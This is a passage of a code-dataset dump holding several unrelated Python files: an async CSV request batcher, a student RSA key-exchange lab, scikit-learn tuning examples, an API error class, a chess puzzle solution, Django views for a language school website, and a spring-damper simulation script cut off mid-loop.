= asyncio.get_event_loop()\n tasks = []\n line_instances = []\n stats = ''\n\n with open('source/' + const.csv_file, 'r') as input_file, \\\n open('source/ZIP_' + str(part) + '.txt', 'w+') as output_file:\n lines = input_file.readlines()\n start = (part - 1) * const.REQUESTS_AT_ONCE\n end = part * const.REQUESTS_AT_ONCE \\\n if part != const.TOTAL_PARTS_AMOUNT \\\n else const.REQUESTS_AT_ONCE * (const.TOTAL_PARTS_AMOUNT - 1) + const.REQUESTS_AT_LAST\n print('part :: {}, delta :: {}'.format(part, end - start))\n\n for c in range(1, len(lines)):\n temp = LineRecord(c, lines[c], part)\n line_instances.append(temp)\n\n print_app_in_process_time(time_start, 'LineRecord formed')\n inst_set = list(set(line_instances))\n print(len(inst_set))\n\n stats += '***** PART :: {} *****\\n'.format(part)\n stats += 'Amount of requests :: {}\\n\\n'.format(len(inst_set[start:end]))\n\n for i in range(start, end):\n task = asyncio.ensure_future(\n fetch_and_write_data(inst_set[i], i-start)\n )\n tasks.append(task)\n\n loop.run_until_complete(asyncio.wait(tasks))\n\n success_count = 0\n failed_requests = 0\n failed_requests_info = '\\n\\n'\n\n for i in range(start, end):\n item = inst_set[i]\n\n if item.is_done:\n success_count += 1\n output_file.write(item.completed_line)\n else:\n failed_requests += 1\n if item.response_status == 'OVER_QUERY_LIMIT':\n print(item.url)\n failed_requests_info += '***{};{}\\n'.format(\n item.line, item.response_status\n )\n else:\n failed_requests_info += '{};{}\\n'.format(\n item.line, item.response_status\n )\n\n stats += 
'Success count :: {}\\nFailed requests :: {}\\n{}'.format(\n            success_count, failed_requests, failed_requests_info\n        )\n\n    with open('source/ZIP_' + str(part) + '_stats.txt', 'w+') as output_stats:\n        output_stats.write(stats)\n\n    print_app_in_process_time(time_start, 'It takes')\n\n\ndef combine_parts(num_parts):\n    with open('source/ZIP_FULL_INFO.txt', 'w+') as output_file:\n        for i in range(1, num_parts + 1):\n            with open('source/ZIP_' + str(i) + '.txt', 'r') as input_file:\n                lines = input_file.readlines()\n\n                for line in lines:\n                    output_file.write(line)\n\n    print_app_in_process_time(time_start, 'It takes')\n","sub_path":"toParse/bin/file_handling.py","file_name":"file_handling.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"466819276","text":"import random\r\nimport math\r\nimport requests\r\nimport json\r\n\r\n\r\ndef NSD(a, b):\r\n    if a == 0:\r\n        return (b, 0, 1)\r\n    else:\r\n        nsd, x, y = NSD(b % a, a)\r\n        return (nsd, y - (b // a) * x, x)\r\n\r\n\r\ndef obratnoe(b, n):\r\n    nsd, x, y = NSD(b, n)\r\n    if nsd == 1:\r\n        return x % n\r\n\r\n\r\ndef primenumber_check(n, k):  # Miller-Rabin\r\n    t = 0\r\n    m = n - 1\r\n    if n == 2 or n == 3:\r\n        return True\r\n    if n % 2 == 0:\r\n        return False\r\n    while m % 2 == 0:\r\n        m = m // 2\r\n        t += 1\r\n    for i in range(k):\r\n        a = random.randrange(2, n - 1)\r\n        u = pow(a, m, n)\r\n        if u == 1:\r\n            continue\r\n        if u == n - 1:\r\n            continue\r\n        j = 1\r\n        while u != -1 and j < t:\r\n            u = pow(u, 2, n)\r\n            if u == n - 1:\r\n                break\r\n            j = j + 1\r\n        else:\r\n            return False\r\n    return True\r\n\r\ndef GeneratePrime(n):\r\n    n = n-1\r\n    num=2**n\r\n    i = 1\r\n    while i != n:\r\n        rand = random.randint(0,1)\r\n        num += (2**i)*rand\r\n        i = i + 1\r\n    num += 1\r\n    return num\r\n\r\ndef GenerateKeyPair(n):\r\n    while True:\r\n        pair = []\r\n        i = 0\r\n        f = open('log.txt', 'w')\r\n        while i != 2:\r\n            c = GeneratePrime(n)\r\n            if not primenumber_check(c, 10):\r\n                back = False\r\n                while back is False:\r\n                    c = GeneratePrime(n)\r\n                    if primenumber_check(c, 10):\r\n                        pair.append(c)\r\n                        i += 1\r\n                        back = True\r\n                    else:\r\n                        f.write(str(hex(c)) + \" isn't prime \\n\")\r\n        return pair\r\n\r\n\r\n\r\ndef FindOpenKey(p, q):\r\n    n = p * q\r\n    phi = (p - 1) * (q - 1)\r\n    while True:\r\n        e = random.randint(2, phi - 1)\r\n        if math.gcd(e, phi) == 1:\r\n            d = obratnoe(e, phi)\r\n            print(\"n \" + str(hex(n)))\r\n            print(\"e \" + str(hex(e)))\r\n            print(\"d \" + str(hex(d)))\r\n            return n, e, d\r\n\r\n\r\ndef Encrypt(K, e, n):\r\n    return pow(K, e, n)\r\n\r\n\r\ndef Decrypt(K, d, n):\r\n    return pow(K, d, n)\r\n\r\n\r\ndef Sign(K, d, n):\r\n    return pow(K, d, n)\r\n\r\n\r\ndef Verify(K, s, e, n):\r\n    return pow(s, e, n) == K\r\n\r\n\r\ndef SendKey(K, n1, d1, n2, e2):\r\n    print(\"------SENT KEYS---------\")\r\n    K1 = Encrypt(K, e2, n2)\r\n    print(\"K1 = {}\".format(hex(K1)[2:]))\r\n    S = Sign(K, d1, n1)\r\n    print(\"S = {}\".format(hex(S)[2:]))\r\n    S1 = Encrypt(S, e2, n2)\r\n    print(\"S1 = {}\".format(hex(S1)[2:]))\r\n\r\n    return K1, S1\r\n\r\n\r\ndef ReceiveKey(eK, S1, n1, e1, n2, d2):\r\n    print(\"------RECEIVED KEYS---------\")\r\n    S = Decrypt(S1, d2, n2)\r\n    K = Decrypt(eK, d2, n2)\r\n    if Verify(K, S, e1, n1):\r\n        print(\"S = {}\".format(hex(S)[2:]))\r\n        print(\"K = {}\".format(hex(K)[2:]))\r\n        return K, S\r\n\r\n\r\nwhile True:\r\n    a = input(\"1.Server / 2.Local?\")\r\n    if a in '2':\r\n        print('\\n' * 100)\r\n        while True:\r\n            pair1 = GenerateKeyPair(512)\r\n            pair2 = GenerateKeyPair(512)\r\n            p, q, p1, q1 = pair1[0], pair1[1], pair2[0], pair2[1]\r\n            if p*q <= p1*q1:\r\n                break\r\n        print(\"p: \" + str(hex(p)), \"q: \" + str(hex(q)), \"p1: \" + str(hex(p1)), \"q1: \" + str(hex(q1)), sep='\\n')\r\n        n1, e1, d1 = FindOpenKey(p, q)  # A\r\n        n2, e2, d2 = FindOpenKey(p1, q1)  # B\r\n\r\n        Message = 
random.randint(0, n1)\r\n        print(\"K: \" + str(hex(Message)[2:]))\r\n        print(d2)\r\n        EncryptedMessage, EncryptedSignature = SendKey(Message, n1, d1, n2, e2)\r\n        ReceiveKey(EncryptedMessage, EncryptedSignature, n1, e1, n2, d2)\r\n        print(\"\\n\" * 3)\r\n\r\n    if a in '1':\r\n        print('\\n' * 100)\r\n        print('\\n' * 100)\r\n        pair1= GenerateKeyPair(256)\r\n        pair2 = GenerateKeyPair(256)\r\n        p, q = pair1[0], pair1[1]\r\n        p1,q1 = pair2[0],pair2[1]\r\n        n1, e1, d1 = FindOpenKey(p, q)  # A\r\n        a = requests.get('http://asymcryptwebservice.appspot.com/rsa/serverKey?keySize=512')\r\n        cookie = a.cookies\r\n        cookie_name = cookie.keys()[0]\r\n        cookie_value = cookie.values()[0]\r\n        a = json.loads(a.text)\r\n        e2 = int(a['publicExponent'], 16)\r\n        n2 = int(a['modulus'], 16)\r\n        print(\"e2: \" + str(hex(e2)))\r\n        print(\"n2: \" + str(hex(n2)))\r\n        while n2 < n1:\r\n            print('\\n'*100)\r\n            pair1 = GenerateKeyPair(256)\r\n            p, q = pair1[0], pair1[1]\r\n            n1, e1, d1 = FindOpenKey(p, q)  # A\r\n        Message = random.randint(0, n1)\r\n        print(\"K: \" + str(hex(Message)[2:]))\r\n        EncryptedMessage, EncryptedSignature = SendKey(Message, n1, d1, n2, e2)\r\n        cookie = {cookie_name: cookie_value}\r\n\r\n        print(\"------RECEIVED KEYS---------\")\r\n        request = \"http://asymcryptwebservice.appspot.com/rsa/receiveKey?key={k}&signature={s}&modulus={n}&publicExponent={e}\".format(\r\n            k=hex(EncryptedMessage)[2:], s=hex(EncryptedSignature)[2:], n=hex(n1)[2:], e=hex(e1)[2:])\r\n        a = json.loads(requests.get(request, cookies=cookie).text)\r\n\r\n        if a['key'][0] == '0':\r\n            print(\"K: \" + a['key'][1:])\r\n        else:\r\n            print(\"K: \" + a['key'])\r\n        print(\"Verified: \" + str(a['verified']))\r\n        print(\"\\n\" * 3)\r\n","sub_path":"cp_4/grigoryan_fb84_biletskiy_fb84_cp4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"442724456","text":"# Hyperparameter tuning with GridSearchCV\n# Import necessary modules\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom scipy.stats import randint\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\n\n# X and y (the feature matrix and target labels) are assumed to be pre-loaded elsewhere\n# Setup the hyperparameter grid\nc_space = np.logspace(-5, 8, 15)\nparam_grid = {'C': c_space}\n\n# Instantiate a logistic regression classifier: logreg\nlogreg = LogisticRegression()\n\n# Instantiate the GridSearchCV object: logreg_cv\nlogreg_cv = GridSearchCV(logreg, param_grid, cv=5)\n\n# Fit it to the data\nlogreg_cv.fit(X, y)\n\n# Print the tuned parameters and score\nprint(\"Tuned Logistic Regression Parameters: {}\".format(logreg_cv.best_params_))\nprint(\"Best score is {}\".format(logreg_cv.best_score_))\n\n\n# Hyperparameter tuning with RandomizedSearchCV\n# Import necessary modules\n\n# Setup the parameters and distributions to sample from: param_dist\nparam_dist = {\"max_depth\": [3, None],\n              \"max_features\": randint(1, 9),\n              \"min_samples_leaf\": randint(1, 9),\n              \"criterion\": [\"gini\", \"entropy\"]}\n\n# Instantiate a Decision Tree classifier: tree\ntree = DecisionTreeClassifier()\n\n# Instantiate the RandomizedSearchCV object: tree_cv\ntree_cv = RandomizedSearchCV(tree, param_dist, cv=5)\n\n# Fit it to the data\ntree_cv.fit(X, y)\n\n# Print the tuned parameters and score\nprint(\"Tuned Decision Tree Parameters: {}\".format(tree_cv.best_params_))\nprint(\"Best score is {}\".format(tree_cv.best_score_))\n","sub_path":"Machine Learning Scientist with Python - Track/Supervised Learning with scikit-learn/3. 
Fine-tuning your model/4_hyperparameter_tunning.py","file_name":"4_hyperparameter_tunning.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"107412416","text":"class APIError(Exception):\n    \"\"\"This class allows application code to wrap exceptions so that they\n    can be transformed into JSON using the flask exception handler\n    hook.\n\n\n    :var exception: Wrapped exception if any.\n    :var message: Message provided by the caller.\n    :var debug: Enable debug mode. Result contains verbose error details.\n    :var status_code: Status code provided by the caller. Default: 400.\n\n    \"\"\"\n    status_code = 400\n\n    def __init__(self, message, debug=False, status_code=None, exception=None):\n        Exception.__init__(self)\n        self.message = message\n        self.debug = debug\n        if status_code is not None:\n            self.status_code = status_code\n        self.exception = exception\n\n    def to_dict(self):\n        \"\"\"Returns a dictionary of values that can be converted to json if\n        needed. In debug mode, the wrapped exception is also returned\n        as a string.\n\n        \"\"\"\n        result = dict(message=self.message, success=False)\n        if self.debug and self.exception is not None:\n            result['exception'] = str(self.exception)\n        return result\n\n    def __str__(self):\n        return \"API Error:\" + \", Message: \" + self.message + \"\\n\" \\\n            + str(self.exception)\n\n\ndef api_error_handler(exception, debug=False):\n    \"\"\"The default error handler. Wraps the exception in an API error object.\n\n    :param exception: The exception to wrap.\n    :param debug: Enable debug mode. Result contains verbose error details.\n\n    \"\"\"\n    return APIError('Unable to process this request',\n                    exception=exception,\n                    debug=debug)\n","sub_path":"todomvc/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"38848724","text":"def safe_pawns(pawns):\n    number=lambda x:int(str(x[1])+str(ord(x[0])-96))\n    pair=list(map(number,pawns))\n    pair.sort(reverse=True)\n    total=0\n    for pawn in pair:\n        guard=(int(pawn)-9,int(pawn)-11)\n        if set(guard) & set(pair):  # intersection requires both operands to be sets\n            total=total+1\n    return total","sub_path":"home/pawn-brotherhood.py","file_name":"pawn-brotherhood.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"616536827","text":"from django.shortcuts import render\nfrom website.models import contato, registro, indicacao, testeNivelamento, respostaNivelamento, perguntasExecutadas\nfrom evento.models import eventoModel\nfrom gerencia.models import perguntaModel, respostaModel\nfrom django.core.mail import EmailMessage\nimport random\nfrom random import shuffle\nimport datetime\nimport os\nfrom twilio.rest import Client\n\n# Create your views here.\n\ndef paginaPrincipal(request):\n    now = datetime.datetime.now().strftime('%H')\n    now = int(now)\n    try:\n        eventoObj1 = eventoModel.objects.latest('id')\n        tituloEvento1 = eventoObj1.titulo\n        descBreveEvento1 = eventoObj1.descricao\n        dataEvento1 = eventoObj1.data_evento\n        diaEvento1 = dataEvento1.strftime(\"%d\")\n        mesEvento1 = dataEvento1.strftime(\"%B\")\n        evento2 = int(eventoObj1.id) - 1\n    except:\n        eventoObj1 = None\n        tituloEvento1 = None\n        descBreveEvento1 = None\n        diaEvento1 = None\n        mesEvento1 = None\n        evento2 = None\n    \n    try:\n        eventoObj2 = eventoModel.objects.get(id=evento2)\n        tituloEvento2 = eventoObj2.titulo\n        descBreveEvento2 = 
eventoObj2.descricao\n dataEvento2 = eventoObj2.data_evento\n diaEvento2 = dataEvento2.strftime(\"%d\")\n mesEvento2 = dataEvento2.strftime(\"%B\")\n evento3 = int(eventoObj2.id) - 1\n except:\n eventoObj2 = None\n tituloEvento2 = None\n descBreveEvento2 = None\n diaEvento2 = None\n mesEvento2 = None\n evento3 = None\n \n try:\n eventoObj3 = eventoModel.objects.get(id=evento2)\n tituloEvento3 = eventoObj3.titulo\n descBreveEvento3 = eventoObj3.descricao\n dataEvento3 = eventoObj3.data_evento\n diaEvento3 = dataEvento3.strftime(\"%d\")\n mesEvento3 = dataEvento3.strftime(\"%B\")\n except:\n eventoObj3 = None\n tituloEvento3 = None\n descBreveEvento3 = None\n diaEvento3 = None\n mesEvento3 = None\n return render(request, 'site/home.html', {'title': 'Home',\n 'tituloEvento1': tituloEvento1,\n 'descBreveEvento1': descBreveEvento1,\n 'diaEvento1': diaEvento1,\n 'mesEvento1': mesEvento1,\n 'eventoObj1':eventoObj1,\n 'tituloEvento2': tituloEvento2,\n 'descBreveEvento2': descBreveEvento2,\n 'diaEvento2': diaEvento2,\n 'mesEvento2': mesEvento2,\n 'eventoObj2':eventoObj2,\n 'tituloEvento3': tituloEvento3,\n 'descBreveEvento3': descBreveEvento3,\n 'diaEvento3': diaEvento3,\n 'mesEvento3': mesEvento3,\n 'eventoObj3':eventoObj3})\n\n\ndef cursos(request):\n return render(request, 'site/cursos.html', {'title': 'Cursos'})\n\ndef kids(request):\n return render(request, 'site/cursos/kids.html', {'title': 'Kids'})\n\ndef adult(request):\n return render(request, 'site/cursos/adult.html', {'title': 'Adult'})\n\ndef business(request):\n return render(request, 'site/cursos/business.html', {'title': 'Business'})\n\ndef inCompany(request):\n return render(request, 'site/cursos/inCompany.html', {'title': 'In Company'})\n\ndef testPreparation(request):\n return render(request, 'site/cursos/testPreparation.html', {'title': 'Test Preparation'})\n\ndef vip(request):\n return render(request, 'site/cursos/vip.html', {'title': 'VIP'})\n\ndef unidades(request):\n return render(request, 'site/unidades.html', {'title': 'Unidades'})\n\ndef tresLagoas(request):\n return render(request, 'site/tresLagoas.html', {'title': 'Três Lagoas'})\n\ndef aguaClara(request):\n return render(request, 'site/aguaClara.html', {'title': 'Água Clara'})\n\ndef ribasRioPardo(request):\n return render(request, 'site/ribasRioPardo.html', {'title': 'Ribas do Rio Pardo'})\n\ndef parceiros(request):\n return render(request, 'site/parceiros.html', {'title': 'Parceiros'})\n\ndef indiqueParceiro(request):\n if request.method == 'POST':\n nome = request.POST.get('nome')\n sobrenome = request.POST.get('sobrenome')\n empresa = request.POST.get('empresa')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n mensagem = request.POST.get('mensagem')\n novaIndicacao = indicacao(nome=nome, empresa=empresa, sobrenome=sobrenome, email=email, telefone=telefone, mensagem=mensagem)\n novaIndicacao.save()\n\n msgEmail = \"Contato recebido via website. 
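paginaPrincipal builds its three event slots with three nearly identical try/except blocks, and the third block fetches id=evento2 again where evento3 was presumably intended. An equivalent single-query sketch, assuming the same eventoModel:

    def latest_events(n=3):
        # One ordered query instead of chained .get(id=...) lookups.
        eventos = eventoModel.objects.order_by('-id')[:n]
        return [{
            'titulo': ev.titulo,
            'descricao': ev.descricao,
            'dia': ev.data_evento.strftime('%d'),
            'mes': ev.data_evento.strftime('%B'),
            'obj': ev,
        } for ev in eventos]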
\\n\\n\\n NOME:\\n\" + nome +\"\\n\\nEMPRESA:\\n\" + empresa + \"\\n\\nTELEFONE:\\n\"+ telefone +\"\\n\\nE-MAIL:\\n\"+ email + \"\\n\\nMENSAGEM:\\n\" + mensagem + \"\\n\\n\\nEssa mensagem foi gerada automaticamente, não responta.\"\n testeEmail = EmailMessage('Contato website - INDICAÇÃO PARCEIRO', msgEmail, to=['winnercallan@uol.com.br'])\n testeEmail.send()\n\n #client = Client() \n #from_whatsapp_number='whatsapp:+5567991865754'\n #to_whatsapp_number='whatsapp:+5567991865754'\n #message = client.messages.create(body='Check out this owl!',\n # from_=from_whatsapp_number,\n # to=to_whatsapp_number)\n\n msgConfirmação = \"Indicação enviada com sucesso!\"\n return render(request, 'site/home.html', {'title': 'Home', 'msgConfirmação':msgConfirmação})\n return render(request, 'site/indiqueParceiro.html', {'title': 'Indique Parceiros'})\n\ndef testeNivelamentoView(request):\n contador = 0\n if request.method == \"POST\" and request.POST.get('nome') != None:\n nome = request.POST.get('nome')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n novoTesteNivelamento = testeNivelamento(nome=nome, email=email, telefone=telefone)\n novoTesteNivelamento.save()\n perguntaObj = perguntaModel.objects.filter(estado=1).order_by('?')[0]\n pergExecutadas = perguntasExecutadas(pergunta=perguntaObj.id)\n pergExecutadas.save()\n novoTesteNivelamento.executadas.add(pergExecutadas)\n novoTesteNivelamento.save()\n contador = contador + 1\n respostas = perguntaObj.respostas.all()\n respostasList = list(respostas)\n shuffle(respostasList)\n return render(request, 'site/finalNivelamento.html', {'title': 'Nivelamento',\n 'perguntaObj':perguntaObj,\n 'contador':contador,\n 'respostas':respostas,\n 'respostasList':respostasList,\n 'testeNivelamentoObj':novoTesteNivelamento})\n return render(request, 'site/nivelamento.html', {'title': 'Nivelamento'})\n\n\ndef PerguntasNivelamento(request):\n if request.method == \"POST\" and request.POST.get('contador') != None and request.POST.get('testeNivelamentoID') != None:\n contador = request.POST.get('contador')\n if int(contador) < 20:\n testeNivelamentoID = request.POST.get('testeNivelamentoID')\n perguntaID = request.POST.get('perguntaID')\n respostaID = request.POST.get('respostaID')\n testeNivelamentoObj = testeNivelamento.objects.get(id=testeNivelamentoID)\n perguntaObj = perguntaModel.objects.get(id=perguntaID)\n respostaObj = respostaModel.objects.get(id=respostaID)\n novaRespostaObj = respostaNivelamento(pergunta= perguntaObj, resposta=respostaObj)\n novaRespostaObj.save()\n testeNivelamentoObj.respostas.add(novaRespostaObj)\n testeNivelamentoObj.save()\n pergExecutadas = perguntasExecutadas(pergunta=perguntaObj.id)\n pergExecutadas.save()\n testeNivelamentoObj.executadas.add(pergExecutadas)\n testeNivelamentoObj.save()\n perguntasExecList = []\n for p in testeNivelamentoObj.executadas.all():\n perguntasExecList.append(p.pergunta)\n contador = int(contador) + 1\n perguntaObjeto = perguntaModel.objects.filter(estado=1).exclude(id__in=perguntasExecList).order_by('?')[0]\n\n respostas = perguntaObjeto.respostas.all()\n respostasList = list(respostas)\n shuffle(respostasList)\n return render(request, 'site/perguntas.html', {'title': 'Nivelamento',\n 'contador':contador,\n 'testeNivelamentoObj':testeNivelamentoObj,\n 'respostasList':respostasList,\n 'perguntaObj':perguntaObjeto})\n if int(contador) >= 20:\n testeNivelamentoID = request.POST.get('testeNivelamentoID')\n perguntaID = request.POST.get('perguntaID')\n respostaID = 
request.POST.get('respostaID')\n testeNivelamentoObj = testeNivelamento.objects.get(id=testeNivelamentoID)\n perguntaObj = perguntaModel.objects.get(id=perguntaID)\n respostaObj = respostaModel.objects.get(id=respostaID)\n novaRespostaObj = respostaNivelamento(pergunta= perguntaObj, resposta=respostaObj)\n novaRespostaObj.save()\n testeNivelamentoObj.respostas.add(novaRespostaObj)\n testeNivelamentoObj.save()\n pergExecutadas = perguntasExecutadas(pergunta=perguntaObj.id)\n pergExecutadas.save()\n testeNivelamentoObj.executadas.add(pergExecutadas)\n testeNivelamentoObj.save()\n perguntasExecList = []\n for p in testeNivelamentoObj.executadas.all():\n perguntasExecList.append(p.pergunta)\n contador = int(contador) + 1\n perguntaObjeto = perguntaModel.objects.filter(estado=1).order_by('?')[0]\n\n respostas = perguntaObjeto.respostas.all()\n respostasList = list(respostas)\n shuffle(respostasList)\n msgConfirmacao = \"FINALIZAR AQUI MESMO\"\n return render(request, 'site/finalNivelamento.html', {'title': 'Nivelamento',\n 'contador':contador,\n 'testeNivelamentoObj':testeNivelamentoObj,\n 'respostasList':respostasList,\n 'perguntaObj':perguntaObjeto,\n 'msgConfirmacao':msgConfirmacao})\n return render(request, 'site/nivelamento.html', {'title': 'Nivelamento'})\n\ndef viewContato(request):\n if request.method == 'POST':\n nome = request.POST.get('nome')\n sobrenome = request.POST.get('sobrenome')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n mensagem = request.POST.get('mensagem')\n novoContato = contato(nome=nome, sobrenome=sobrenome, email=email, telefone=telefone, mensagem=mensagem)\n novoContato.save()\n msgEmail = \"Contato recebido via website. \\n\\n\\n NOME:\\n\" + nome + \" \" + sobrenome +\"\\n\\nTELEFONE:\\n\"+ telefone +\"\\n\\nE-MAIL:\\n\"+ email + \"\\n\\nMENSAGEM:\\n\" + mensagem + \"\\n\\n\\nEssa mensagem foi gerada automaticamente, não responta.\"\n testeEmail = EmailMessage('Contato website - CONTATO', msgEmail, to=['winnercallan@uol.com.br'])\n testeEmail.send()\n \n confirmacao = \"Mensagem enviada com sucesso!\"\n return render(request, 'site/contato.html', {'title': 'Contato', 'confirmacao': confirmacao})\n \n return render(request, 'site/contato.html', {'title': 'Contato'})\n\ndef entrar(request):\n if request.user.is_authenticated:\n alunoVisivel = False\n colaboradorVisivel = False\n classeVisivel = False\n aulasVisivel = False\n contasVisivel = False\n caixaVisivel = False\n estoqueVisivel = False\n controleVisivel = False\n now = datetime.datetime.now().strftime('%H')\n now = int(now)\n msgTelaInicial = \"Olá, \" + request.user.get_short_name() \n if now >= 4 and now <= 11:\n msgTelaInicial = \"Bom dia, \" + request.user.get_short_name() \n elif now > 11 and now < 18:\n msgTelaInicial = \"Boa Tarde, \" + request.user.get_short_name() \n elif now >= 18 and now < 4:\n msgTelaInicial = \"Boa Tarde, \" + request.user.get_short_name()\n \n return render (request, 'gerencia/home.html', {'title':'Home', \n 'alunoVisivel':alunoVisivel,\n 'colaboradorVisivel':colaboradorVisivel, \n 'classeVisivel':classeVisivel, \n 'aulasVisivel':aulasVisivel, \n 'contasVisivel':contasVisivel, \n 'caixaVisivel':caixaVisivel, \n 'estoqueVisivel':estoqueVisivel, \n 'controleVisivel':controleVisivel,\n 'msgTelaInicial':msgTelaInicial})\n return render (request, 'site/login.html', {'title':'Login'})\n\ndef instituicao(request):\n return render(request, 'site/instituicao.html', {'title': 'Instituicao'})\n\ndef metodo(request):\n return render(request, 
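Both branches of PerguntasNivelamento end by drawing one random active question, but the >= 20 branch drops the exclude(id__in=...) filter, and both index with [0], which raises IndexError once the question pool is exhausted. A condensed sketch of the selection step, assuming the same perguntaModel:

    def next_question(executed_ids):
        # One random active question not yet shown in this test.
        qs = (perguntaModel.objects
              .filter(estado=1)
              .exclude(id__in=executed_ids)
              .order_by('?'))
        return qs.first()   # None when exhausted, instead of [0] raising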
'site/metodo.html', {'title': 'Metodo'})\n\ndef colaboradores(request):\n return render(request, 'site/colaboradores.html', {'title': 'Colaboradores'})\n\ndef viewRegistro(request):\n if request.method == \"POST\" and request.POST.get('emailRegistro') != \"\":\n emailRegistro = request.POST.get('emailRegistro')\n novoRegistro = registro(email=emailRegistro)\n novoRegistro.save()\n return render(request, 'site/registro.html', {'title': 'Receber novidades...'})\n return render(request, 'site/registro.html', {'title': 'Receber novidades...'})\n\ndef error_404(request, exception):\n return render(request, 'site/404.html', {'title': 'Error'})\n\ndef error_500(request):\n return render(request, 'site/500.html', {'title': 'Error'})","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"162602538","text":"import tensorflow as tf\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport numpy as np\r\nimport linear_system_function as lsf\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\n\r\n\"过程说明及样本构造\" \\\r\n'''\r\n#系统有质量分别为m1,m2,m3的小车构成,m1通过并联的k1弹簧、c1阻尼器与墙壁相连\r\n#m2通过并联的k2弹簧、c2阻尼器与m1相连,m3通过并联的k3弹簧、c3阻尼器与m2相连,为方便起见m1=k1=c1=1,m2=k2=c2=2,m3=k3=c3=3,\r\n\r\n'''\r\n\r\n\r\n\r\n#计算100s内的位移情况,计算步长为0.01s\r\ndt=0.1\r\nt=np.array(np.linspace(0.1,100,1000))#此处定义步长,总步数要与lsf funtion里对应上\r\nstep_number=800\r\n\r\n\r\n#F1与F3输入\r\n# F1=np.array(np.zeros(1000,))\r\n# for i in range(0,100,2):\r\n# F1[i*10:(i+1)*10]=-50\r\n#\r\n# # F1=t*0\r\n#\r\n# F3=5*np.sin(t)-t\r\n\r\nF3=(t/5.0)*np.sin(t)\r\n\r\nF1=np.array(np.linspace(0,10,1000))\r\nF1[400:600]=0\r\n\r\n\r\n#调用函数计算三段曲线,即调用函数求解常系数线性微分方程\r\nx1,x2,x3=lsf.data(F1,F3)\r\n\r\n#定义标准化矩阵的函数\r\ndef standardization(data):\r\n mu = np.mean(data, axis=0)\r\n sigma = np.std(data, axis=0)\r\n return (data - mu) / sigma\r\n\r\n#X和F由于量纲原因,数值大小差距比较大,故标准化数据\r\nx1=standardization(x1)\r\nx2=standardization(x2)\r\nx3=standardization(x3)\r\nF1=standardization(F1)\r\nF3=standardization(F3)\r\n\r\n\r\n\r\n#绘制x1 x2 x3 三段位移曲线,绘制F1,F3两段载荷曲线\r\nplt.subplot(511)\r\nplt.plot(t,x1,label='x1')\r\nplt.title('x1_curve')\r\nplt.subplot(512)\r\nplt.plot(t,x2,label='x2')\r\nplt.title('x2_curve')\r\nplt.subplot(513)\r\nplt.plot(t,x3,label='x3')\r\nplt.title('x3_curve')\r\nplt.subplot(514)\r\nplt.plot(t,F1,label='F1')\r\nplt.title('F1_curve')\r\nplt.subplot(515)\r\nplt.plot(t,F3,label='F3')\r\nplt.title('F3_curve')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\"这里构造数据集,训练集每次输入的格式为10个数据,即前5个时刻的F1,F3输入\"\r\n\"训练集的结果输入格式为第5个时刻的x1,x2,x3\"\r\n\r\ndata=np.zeros((step_number,30),dtype=float)#定义具有(800,30)格式的初始数组\r\nfor i in range(step_number):\r\n data[i]=np.array([x1[i+2],x2[i+2],x3[i+2],\r\n x1[i+3], x2[i+3], x3[i+3],\r\n x1[i+4], x2[i+4], x3[i+4],\r\n x1[i+5], x2[i+5], x3[i+5],\r\n x1[i+6], x2[i+6], x3[i+6],\r\n F1[i], 0.,F3[i],\r\n F1[i + 1], 0.,F3[i + 1],\r\n F1[i + 2], 0.,F3[i + 2],\r\n F1[i + 3], 0.,F3[i + 3],\r\n F1[i + 4], 0.,F3[i + 4]])\r\n #这里每个temp为一个样本,想法是先让网络看i+2--i+6时刻的x1,x2,x3初值,\r\n # 然后再依次看i---i+4时刻的F1 和 F3的值,观察是否能学习会微分方程\r\n\r\ndata_random=copy.copy(data)\r\nnp.random.shuffle(data_random)#打乱data顺序,这里data维度(800,30)\r\nprint(np.shape(data_random))\r\n\r\n#构造训练集\r\n\r\n#训练集输入\r\ndata_x=np.zeros((step_number,5,3),dtype=float)#定义如(8000,5,3)的格式\r\nfor i in range(step_number):\r\n data_x[i]=[data_random[i][15:18],\r\n data_random[i][18:21],\r\n data_random[i][21:24],\r\n data_random[i][24:27],\r\n 
